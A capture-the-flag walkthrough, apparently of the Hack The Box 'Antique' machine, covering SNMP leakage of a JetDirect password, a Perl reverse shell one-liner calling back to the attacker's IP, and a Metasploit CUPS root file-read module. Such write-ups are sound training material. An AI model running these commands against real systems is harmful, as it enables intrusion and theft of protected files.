neoh main ~/HTB/antique sudo nmap -sSCV -p- -T4 10.10.11.107 -oN nmap.md
[sudo] password for neoh:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 13:19 EST
Nmap scan report for 10.10.11.107
Host is up (0.027s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
| JetDirect
| Password:
| NULL:
|_ JetDirect
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.80%I=7%D=11/14%Time=6191534A%P=x86_64-pc-linux-gnu%r(NUL
SF:L,F,"\nHP\x20JetDirect\n\n")%r(GenericLines,19,"\nHP\x20JetDirect\n\nPa
SF:ssword:\x20")%r(tn3270,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(GetRe
SF:quest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(HTTPOptions,19,"\nHP\x
SF:20JetDirect\n\nPassword:\x20")%r(RTSPRequest,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(RPCCheck,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DN
SF:SVersionBindReqTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(DNSStatus
SF:RequestTCP,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Help,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(SSLSessionReq,19,"\nHP\x20JetDirect\n\nP
SF:assword:\x20")%r(TerminalServerCookie,19,"\nHP\x20JetDirect\n\nPassword
SF::\x20")%r(TLSSessionReq,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(Kerb
SF:eros,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(SMBProgNeg,19,"\nHP\x20
SF:JetDirect\n\nPassword:\x20")%r(X11Probe,19,"\nHP\x20JetDirect\n\nPasswo
SF:rd:\x20")%r(FourOhFourRequest,19,"\nHP\x20JetDirect\n\nPassword:\x20")%
SF:r(LPDString,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPSearchReq,19
SF:,"\nHP\x20JetDirect\n\nPassword:\x20")%r(LDAPBindReq,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(SIPOptions,19,"\nHP\x20JetDirect\n\nPassword:\
SF:x20")%r(LANDesk-RC,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(TerminalS
SF:erver,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(NCP,19,"\nHP\x20JetDir
SF:ect\n\nPassword:\x20")%r(NotesRPC,19,"\nHP\x20JetDirect\n\nPassword:\x2
SF:0")%r(JavaRMI,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(WMSRequest,19,
SF:"\nHP\x20JetDirect\n\nPassword:\x20")%r(oracle-tns,19,"\nHP\x20JetDirec
SF:t\n\nPassword:\x20")%r(ms-sql-s,19,"\nHP\x20JetDirect\n\nPassword:\x20"
SF:)%r(afp,19,"\nHP\x20JetDirect\n\nPassword:\x20")%r(giop,19,"\nHP\x20Jet
SF:Direct\n\nPassword:\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.54 secondsNmap reveals telnet port which seems to be a remote management endpoint for JetDirect printer. Let’s try it!
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password:
Invalid password
Connection closed by foreign host.
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: admin
Invalid password
Connection closed by foreign host.I’m gonna need to find the password for this… After a while I found this blog post showing how to exploit by “Getting a JetDirect password remotely using the SNMP vulnerability“. I’ll use snmpwalk.
neoh main ~/HTB/antique snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135I can then convert the HEX with xdd and login to the printer.
neoh main ~/HTB/antique echo "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
> 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135" | xxd -r -p
[email protected]@123!!123�q��"2Rbs3CSs��$4�Eu�WGW�(8i IY�aA�"1&1A5
neoh main ~/HTB/antique telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: [email protected]@123!!123
Please type "?" for HELP
>
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet sessionUsing the ? command I see at the bottom I can execute a command. I’ll try executing a reverse shell code. First I start a listener.
neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444> exec perl -e 'use Socket;$i="10.10.14.13";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.107 53234
sh: 0: can't access tty; job control turned off
$ whoami
lp
$Looking at local ports i found something running on port 631
[email protected]:/etc$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 820/python3
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
udp 0 0 0.0.0.0:161 0.0.0.0:* -I Tried netcat and got no response but curl did show it was a website.
[email protected]:/etc$ nc localhost 631
nc localhost 631
[email protected]:/etc$
[email protected]:/etc$ curl -is -X GET localhost:631
curl -is -X GET localhost:631
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 19:01:31 GMT
Server: CUPS/1.6
Connection: Keep-Alive
Keep-Alive: timeout=30
Content-Language: en_US
Content-Type: text/html; charset=utf-8
Last-Modified: Thu, 13 May 2021 05:36:41 GMT
Content-Length: 3792
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<TITLE>Home - CUPS 1.6.1</TITLE>
<LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
<LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/"> Home </A></TD>
<TD CLASS="unsel"><A HREF="/admin"> Administration </A></TD>
<TD CLASS="unsel"><A HREF="/classes/"> Classes </A></TD>
<TD CLASS="unsel"><A HREF="/help/"> Online Help </A></TD>
<TD CLASS="unsel"><A HREF="/jobs/"> Jobs </A></TD>
<TD CLASS="unsel"><A HREF="/printers/"> Printers </A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE>
<TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;">
<H1>CUPS 1.6.1</H1>
<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>®</SUP> X and
other UNIX<SUP>®</SUP>-like operating systems.</P>
</TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE>
<TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;">
<H2>CUPS for Users</H2>
<P><A HREF="help/overview.html">Overview of CUPS</A></P>
<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>
<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>
</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">
<H2>CUPS for Administrators</H2>
<P><A HREF="admin">Adding Printers and Classes</A></P>
<P><A HREF="help/policies.html">Managing Operation Policies</A></P>
<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>
<P><A HREF="help/security.html">Server Security</A></P>
<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>
<P><A HREF="help/network.html">Using Network Printers</A></P>
<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>
<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>
</TD><TD VALIGN="top" STYLE="padding-left: 20px;">
<H2>CUPS for Developers</H2>
<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>
<P><A HREF="help/api-cups.html">CUPS API</A></P>
<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>
<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>
<P><A HREF="help/api-ppd.html">PPD API</A></P>
<P><A HREF="help/api-raster.html">Raster API</A></P>
<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>
<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>
</TD></TR>
</TABLE>
</TD></TR>
<TR><TD> </TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>CUPS 1.6.1 is an old and vulnerable version. I start metasploit to obtain a reverse shell.
neoh main ~/HTB/antique msfconsole
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.1.12-dev-25b41c9174 ]
+ -- --=[ 2174 exploits - 1152 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf6 exploit(multi/handler) > set lport 4445
lport => 4445
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.13:4445
[*] Command shell session 1 opened (10.10.14.13:4445 -> 10.10.11.107:60800 ) at 2021-11-14 14:27:43 -0500
whoami
lp
background
Background session 1? [y/N] y
msf6 exploit(multi/handler) > search cups
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/escalate/cups_root_file_read 2012-11-20 normal No CUPS 1.6.1 Root File Read
1 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/cups_bash_env_exec
msf6 exploit(multi/handler) > use 0
msf6 post(multi/escalate/cups_root_file_read) > options
Module options (post/multi/escalate/cups_root_file_read):
Name Current Setting Required Description
---- --------------- -------- -----------
ERROR_LOG /var/log/cups/error_log yes The original path to the CUPS error log
FILE /etc/shadow yes The file to steal.
SESSION yes The session to run this module on
msf6 post(multi/escalate/cups_root_file_read) > set SESSION 1
SESSION => 1
msf6 post(multi/escalate/cups_root_file_read) > set FILE /root/root.txt
FiLE => /root/root.txt
msf6 post(multi/escalate/cups_root_file_read) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session type: shell
[!] * incompatible session platform: bsd
[+] User in lpadmin group, continuing...
[+] cupsctl binary found in $PATH
[+] nc binary found in $PATH
[*] Found CUPS 1.6.1
[+] File /root/root.txt (32 bytes) saved to /home/neoh/.msf4/loot/20211114143439_default_10.10.11.107_cups_file_read_516638.txt
[*] Cleaning up...
[*] Post module execution completed
msf6 post(multi/escalate/cups_root_file_read) >So the expoit worked and I can get the root.txt file!